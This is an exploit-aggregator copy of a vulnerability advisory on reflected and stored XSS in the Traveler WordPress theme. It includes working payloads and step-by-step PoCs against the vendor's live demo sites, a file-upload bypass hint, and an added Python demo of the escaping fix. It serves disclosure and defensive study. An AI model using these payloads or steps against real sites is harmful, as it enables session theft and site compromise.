Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections

CVE: not listed
Category: CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. Cross-site Scripting)
Price: $500
Severity: High
Author: Unknown (the advisory itself credits QUIXSS)
Risk: High
Exploitation Type: Remote
Date: 2019-05-07
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L (vector as published on the aggregator; the metrics after the prefix are CVSS v3.x syntax, since v4.0 has no Scope metric and replaces C/I/A with VC/VI/VA and SC/SI/SA)
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050064

Below is a copy:

[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7.1
  
[?] :: Technical Details & Description:
# Insufficient filtering and output encoding of user-supplied data in input and textarea fields has been discovered in the Traveler - Travel Booking WordPress Theme. The current version of this premium theme at the time of writing is 2.7.1.

[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend #1: https://carmap.travelerwp.com/
# Backend #1: https://carmap.travelerwp.com/page-user-setting/
# Frontend #2: https://remap.travelerwp.com/
# Backend #2: https://remap.travelerwp.com/page-user-setting/

[!] :: Special Note:
# 5,869 sales on ThemeForest at the time of writing.
# The Change Avatar upload field behaves strangely: a PHP file renamed with a double extension such as .php.png is accepted and breaks the profile page (the server responds with HTTP 500). A null byte injection in the filename is another possibility worth testing, but on the demo website any direct request for an uploaded file is blocked by Cloudflare, so neither could be confirmed there.
# In Google Chrome the reflected XSS does not fire because the browser's built-in XSS Auditor blocks the reflected payload (the Auditor was removed in Chrome 78 later in 2019, so current Chrome versions no longer block it); use Mozilla Firefox or Opera instead to reproduce it.

[!] :: For developers:
# Disabling data changes on demo websites does not make your application any more secure. It may be good for business and sales, but you are simply misleading your clients.

[+] :: PoC [Links]:
# https://carmap.travelerwp.com/page-user-setting/
# https://remap.travelerwp.com/page-user-setting/
# https://remap.travelerwp.com/st_rental/midtown-manhattan-oversized/
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
# https://remap.travelerwp.com/?s="><img src=x onerror=alert(`QUIXSS`)>
# https://remap.travelerwp.com/?s=%22%3E%3Cinput%20type=text%20autofocus%20onfocus=alert(document.cookie)%3E

[+] :: PoC [Reflected XSS Injection]:
# For the reflected XSS, use the default WordPress search on the demo website: https://remap.travelerwp.com/?s=[payload]. The search term is echoed back into the search input field, so the payload starts with "> to close that field before injecting its own element (the same trick the stored payloads below use).
# Sample payload #1: "><img src=x onerror=alert(document.cookie)>
# Sample payload #2: "><input type=text autofocus onfocus=alert(document.cookie)>

[+] :: PoC [Stored XSS Injection]:
# Go to the demo website https://carmap.travelerwp.com and register a new account (there is no validation or activation step), then log in. Next open https://carmap.travelerwp.com/page-user-setting/. All input fields except Username and E-mail can be used for stored XSS; for a quick test, any payload starting with "> (to close an input field) or </textarea> (to close a text box) will do. Save the form and the payload is stored and rendered on the next page load.
# The same applies to other theme forms: the Checkout page https://remap.travelerwp.com/checkout/ has multiple vulnerable input fields, the Write Review page https://remap.travelerwp.com/page-user-setting/?sc=write_review&item_id=1084 is affected as well, and so on.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: </textarea><img src="x" onerror="window.location.replace('https://twitter.com/quixss');">
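As an added example that is not part of the advisory or of the theme's code, the following Python models both injection contexts the reflected and stored PoCs above rely on: the ?s= term echoed into an <input value="..."> and a stored profile field printed inside a <textarea>. Each page is rendered once without escaping and once with the context-appropriate escape (the same entity encoding WordPress' esc_attr() and esc_textarea() apply), then tokenised the way a browser would so the breakout shows up as an extra tag carrying an on* handler. The two page templates and the field name "bio" are constructed stand-ins, not the theme's real markup.

```python
"""
Added example, not code from the QUIXSS advisory or from the Traveler theme.
Models the attribute and textarea output contexts the advisory abuses and shows
why the context-appropriate escape stops the breakout. Templates and the field
name "bio" are constructed assumptions, not the theme's markup.
"""
import html
from html.parser import HTMLParser

# Payloads quoted in the advisory.
REFLECTED_PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'
STORED_PAYLOAD = ('</textarea><img src="x" '
                  'onerror="window.location.replace(\'https://twitter.com/quixss\');">')


def esc_attr(value: str) -> str:
    """Escape for a quoted HTML attribute: & < > " ' become entities (what WP esc_attr() does)."""
    return html.escape(value, quote=True)


def esc_textarea(value: str) -> str:
    """Escape for <textarea> content: a literal </textarea> is the only way out of the
    element, so encoding '<' is what matters; encoding the rest is harmless."""
    return html.escape(value, quote=True)


def render_search_page(term: str, escape: bool) -> str:
    """Constructed stand-in for a search form that echoes ?s= into value=""."""
    shown = esc_attr(term) if escape else term
    return f'<form action="/" method="get"><input type="text" name="s" value="{shown}"></form>'


def render_profile_page(bio: str, escape: bool) -> str:
    """Constructed stand-in for a profile form that prints a stored field in a textarea."""
    shown = esc_textarea(bio) if escape else bio
    return f'<form method="post"><textarea name="bio">{shown}</textarea></form>'


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, as the browser would tokenise them."""

    def __init__(self) -> None:
        super().__init__()
        self.elements = []  # list of (tag, {attr: value})

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))


def _parse(page: str) -> _TagCollector:
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    return parser


def audit(page: str, expected_tags: set) -> dict:
    """Report tags the template itself did not emit and every on* handler found."""
    parser = _parse(page)
    unexpected = [tag for tag, _ in parser.elements if tag not in expected_tags]
    handlers = [name for _, attrs in parser.elements
                for name in attrs if name.startswith("on")]
    return {"unexpected_tags": unexpected, "event_handlers": handlers}


def reflected_search_value(page: str):
    """The value the browser would show in the search box (None if no such input)."""
    for tag, attrs in _parse(page).elements:
        if tag == "input" and attrs.get("name") == "s":
            return attrs.get("value")
    return None


if __name__ == "__main__":
    cases = [
        ("reflected, unescaped", render_search_page(REFLECTED_PAYLOAD, False), {"form", "input"}),
        ("reflected, esc_attr", render_search_page(REFLECTED_PAYLOAD, True), {"form", "input"}),
        ("stored, unescaped", render_profile_page(STORED_PAYLOAD, False), {"form", "textarea"}),
        ("stored, esc_textarea", render_profile_page(STORED_PAYLOAD, True), {"form", "textarea"}),
    ]
    for label, page, expected in cases:
        print(f"{label:21} {audit(page, expected)}")
```

With escaping in place the search box round-trips the payload as an ordinary string value and no img element or onerror handler reaches the DOM; without it the browser closes the input (or textarea) early and parses the attacker's element as markup, which is exactly what the PoC links above demonstrate on the demo sites.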

Copyright ©2024 Exploitalert.
